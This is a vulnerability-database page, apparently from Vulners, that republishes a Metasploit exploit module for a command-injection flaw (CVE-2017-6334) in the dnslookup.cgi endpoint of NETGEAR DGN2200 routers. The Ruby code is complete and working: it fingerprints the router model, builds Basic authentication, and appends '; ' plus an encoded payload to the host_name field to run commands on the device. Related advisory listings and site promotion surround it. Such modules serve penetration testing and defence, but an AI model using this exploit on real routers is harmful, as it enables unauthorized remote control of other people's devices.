Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Netgear DGN2200 - dnslookup.cgi Command Injection Exploit

🗓️ 26 Jun 2017 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 55 Views

Netgear DGN2200 dnslookup.cgi Command Injectio

Related
Code
ReporterTitlePublishedViews
Family
0day.today		NETGEAR DGN2200 v1/v2/v3/v4 - dnslookup.cgi Remote Command Execution Exploit
27 Feb 201700:00
zdt
0day.today		NETGEAR DGN2200 v1/v2/v3/v4 - Cross-Site Request Forgery Vulnerability
28 Feb 201700:00
zdt
0day.today		VideoLAN VLC Media Player 2.2.5 EphemeralCockroach Heap Overflow Exploit
4 Mar 201800:00
zdt
ATTACKERKB		CVE-2017-6334
6 Mar 201700:00
attackerkb
BDU FSTEC		The vulnerability of the ping.cgi script in NETGEAR DGN2200 router’s embedded software allows a hacker to execute arbitrary commands and gain full control over the device.
31 May 202300:00
bdu_fstec
Circl		CVE-2017-6334
25 Feb 201700:00
circl
CISA KEV Catalog		NETGEAR DGN2200 Devices OS Command Injection Vulnerability
25 Mar 202200:00
cisa_kev
CNVD		NETGEAR DGN2200 Remote Code Execution Vulnerability
1 Mar 201700:00
cnvd
Check Point Advisories		Netgear DGN2200 dnslookup.cgi Command Injection (CVE-2017-6334)
26 Jul 201700:00
checkpoint_advisories
CVE		CVE-2017-6334
6 Mar 201702:00
cve
Rows per page
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'net/http'
require "base64"
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
 
  def initialize(info = {})
    super(update_info(info,
      'Name'                 => "Netgear DGN2200 dnslookup.cgi Command Injection",
      'Description'          => %q{
        This module exploits a command injection vulnerablity in NETGEAR
        DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request
        with valid login details.
      },
      'License'              => MSF_LICENSE,
      'Platform'             => 'unix',
      'Author'               => [
        'thecarterb',  # Metasploit Module
        'SivertPL'     # Vuln discovery
      ],
      'DefaultTarget'        => 0,
      'Privileged'           => true,
      'Arch'                 => [ARCH_CMD],
      'Targets'              => [
        [ 'NETGEAR DDGN2200 Router', { } ]
      ],
      'References'           =>
        [
          [ 'EDB', '41459'],
          [ 'CVE', '2017-6334']
        ],
      'DisclosureDate' => 'Feb 25 2017',
    ))
 
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
      ])
 
    register_advanced_options(
    [
      OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com'])
    ])
    end
 
  # Requests the login page which tells us the hardware version
  def check
    res = send_request_cgi({'uri'=>'/'})
    if res.nil?
      fail_with(Failure::Unreachable, 'Connection timed out.')
    end
     # Checks for the `WWW-Authenticate` header in the response
    if res.headers["WWW-Authenticate"]
      data = res.to_s
      marker_one = "Basic realm=\"NETGEAR "
      marker_two = "\""
      model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]
      vprint_status("Router is a NETGEAR router (#{model})")
      model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 'DGN2200v4']
      if model_numbers.include?(model)
        print_good("Router may be vulnerable (NETGEAR #{model})")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    else
      print_error('Router is not a NETGEAR router')
      return CheckCode::Safe
    end
  end
 
  def exploit
    check
 
    # Convert datastores
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    hostname = datastore['HOSTNAME']
 
    vprint_status("Using encoder: #{payload.encoder} ")
    print_status('Sending payload...')
 
    vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)")
 
    creds_combined = Base64.strict_encode64("#{user}:#{pass}")
    vprint_status("Encoded authentication: #{creds_combined}")
 
    res = send_request_cgi({
      'uri'         => '/dnslookup.cgi',
      'headers'     => {
        'Authorization' => "Basic #{creds_combined}"
      },
      'vars_post'   => {
        'lookup'    => 'Lookup',
        'host_name' => hostname + '; ' + payload.encoded
    }})
 
  end
end

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jun 2017 00:00Current
8.7High risk
Vulners AI Score8.7
EPSS0.89207
metasploit modulevuln discoverynetgeardgn2200v1dgn2200v2dgn2200v3dgn2200v4command injectionauthenticationexploitremotehttpclientunixedbcve2017-6334feb 25 2017basic realmauthorizationdns lookup
55